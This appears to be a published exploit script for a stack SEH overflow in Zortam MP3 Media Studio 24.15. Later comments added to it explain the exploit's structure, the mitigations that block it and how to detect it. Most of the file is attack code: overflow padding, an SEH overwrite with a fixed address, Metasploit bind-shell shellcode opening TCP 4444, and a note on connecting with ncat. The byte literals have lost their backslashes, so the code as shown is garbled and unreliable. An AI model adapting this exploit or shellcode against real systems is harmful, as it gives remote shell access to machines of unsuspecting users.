Category: Vulnerabilities
#Exploit Title: Zortam MP3 Media Studio Version 24.15 Exploit (SEH)
#Version: 24.15
#Exploit Author: Manpreet Singh Kheberi
#Date: December 13 2018
#Download Link: https://www.zortam.com/download.html
#Vendor Homepage: https://www.zortam.com
#Tested on: Windows Xp Sp3 x64
#Type: Bind shell
# Banner printed when the generator runs. These are Python 2 print statements,
# so the file does not parse under Python 3.
# The INSTRUCTIONS line records the trigger path reported by the author: the
# generated string is pasted into the text field of the "New mp3 Library"
# dialog. The overflow is therefore reached through a local GUI input field
# and needs user interaction; the only network exposure described is the
# listener the payload is said to open on TCP 4444.
print "-----------------------------------------------------------------------------------------------------------------------"
print " Zortam MP3 media studio Exploit (SEH) "
print " by Manpreet Singh Kheberi "
print "Generated File zortam-exploit.txt "
print "INSTRUCTIONS:"
print "Go to File > New mp3 Library > Yes > Paste the payload in select textfield > click ok > You have a shell on port 4444 "
print "-----------------------------------------------------------------------------------------------------------------------"


# Name of the output artefact; open() later creates it relative to the
# current working directory.
filename = "zortam-exploit.txt"
# NOTE(review): every "xNN" literal in this listing lacks a backslash, so as
# shown each one is plain text ("x41" is three characters), not one raw byte.
# The comments below describe the role each variable has by its name and by
# its position in the concatenation at the end of the script.
# Filler repeated 268 times; by position it pads the input up to the
# exception-registration record. The 268 figure is the author's and is not
# derived anywhere on this page.
junk = "x41"*268
# Value for the "next SEH" field of the overwritten record -- presumably two
# NOPs followed by a short forward jump when read as bytes; TODO confirm.
nseh="x90x90xebx12"

# Value for the handler-pointer field: a hard-coded address. The page does not
# say which module it points into. A fixed address like this stays valid only
# while that module loads at the same base and is not covered by
# SafeSEH/SEHOP/ASLR, which is why those mitigations matter for this bug class.
seh ="x8ex32xb5x02"

# Padding placed between the record and the payload (19 + 4 repetitions of the
# same value); `brk` holds the same value as `nop` despite its name.
nop="x90"*19
brk="x90x90x90x90"

# Payload stage. According to the author's notes it is a stock Metasploit
# bind shell, generated with the command recorded below, that listens on
# TCP 4444 of the machine running the application.
# bind shell generated using metasploit
#msfvenom -p windows/shell_bind_tcp LPORT=4444 -f python
# This will open a bind shell on port 4444
# use ncat Target-IP 4444
# Detection/mitigation view: the observable behaviour of this payload type is
# a new listening socket on TCP 4444 owned by the media application's process,
# typically followed by a command shell running as its child. Host firewall
# rules that drop unsolicited inbound connections limit who can reach it.
# NOTE(review): the literals below have no backslashes, so as shown `buf` is
# ordinary text rather than the byte string the generator would have emitted.

buf = ""
buf += "xdaxdfxbdxb7x95xd2xc2xd9x74x24xf4x5bx33"
buf += "xc9xb1x53x83xebxfcx31x6bx13x03xdcx86x30"
buf += "x37xdex41x36xb8x1ex92x57x30xfbxa3x57x26"
buf += "x88x94x67x2cxdcx18x03x60xf4xabx61xadxfb"
buf += "x1cxcfx8bx32x9cx7cxefx55x1ex7fx3cxb5x1f"
buf += "xb0x31xb4x58xadxb8xe4x31xb9x6fx18x35xf7"
buf += "xb3x93x05x19xb4x40xddx18x95xd7x55x43x35"
buf += "xd6xbaxffx7cxc0xdfx3ax36x7bx2bxb0xc9xad"
buf += "x65x39x65x90x49xc8x77xd5x6ex33x02x2fx8d"
buf += "xcex15xf4xefx14x93xeex48xdex03xcax69x33"
buf += "xd5x99x66xf8x91xc5x6axffx76x7ex96x74x79"
buf += "x50x1excex5ex74x7ax94xffx2dx26x7bxffx2d"
buf += "x89x24xa5x26x24x30xd4x65x21xf5xd5x95xb1"
buf += "x91x6exe6x83x3exc5x60xa8xb7xc3x77xcfxed"
buf += "xb4xe7x2ex0exc5x2exf5x5ax95x58xdcxe2x7e"
buf += "x98xe1x36xeax90x44xe9x09x5dx36x59x8excd"
buf += "xdfxb3x01x32xffxbbxcbx5bx68x46xf4x72x35"
buf += "xcfx12x1exd5x99x8dxb6x17xfex05x21x67xd4"
buf += "x3dxc5x20x3exf9xeaxb0x14xadx7cx3bx7bx69"
buf += "x9dx3cx56xd9xcaxabx2cx88xb9x4ax30x81x29"
buf += "xeexa3x4exa9x79xd8xd8xfex2ex2ex11x6axc3"
buf += "x09x8bx88x1excfxf4x08xc5x2cxfax91x88x09"
buf += "xd8x81x54x91x64xf5x08xc4x32xa3xeexbexf4"
buf += "x1dxb9x6dx5fxc9x3cx5ex60x8fx40x8bx16x6f"
buf += "xf0x62x6fx90x3dxe3x67xe9x23x93x88x20xe0"
buf += "xa3xc2x68x41x2cx8bxf9xd3x31x2cxd4x10x4c"
buf += "xafxdcxe8xabxafx95xedxf0x77x46x9cx69x12"
buf += "x68x33x89x37"

# Leftover development notes: a commented-out 0xCC filler and a marker for a
# calc.exe test payload. Neither affects the generated file.
#boom+= "xCCxCCxCCxCC"
#calc.exe


# Used for initial exploit development phase
# Probe table listing the values 0x01 through 0xff in order. `bchar` is never
# added to `exploit` at the end of the script, so it is dead code here and
# contributes nothing to the output file.
bchar = "x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10"
bchar += "x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
bchar +="x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30"
bchar +="x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
bchar +="x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50"
bchar +="x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"
bchar +="x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70"
bchar +="x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
bchar +="x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90"
bchar +="x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
bchar +="xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0"
bchar +="xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
bchar +="xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0"
bchar +="xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"
bchar +="xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0"
bchar +="xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"



# Assemble the output in this order: filler, next-SEH value, handler-pointer
# value, padding, payload. `bchar` is not part of it.
exploit = junk+nseh+seh+nop+brk+buf
# Written in text mode ("w") to `filename` in the current working directory.
# There is no error handling: if write() raises, close() is never reached.
textfile = open(filename,"w")
textfile.write(exploit)
textfile.close()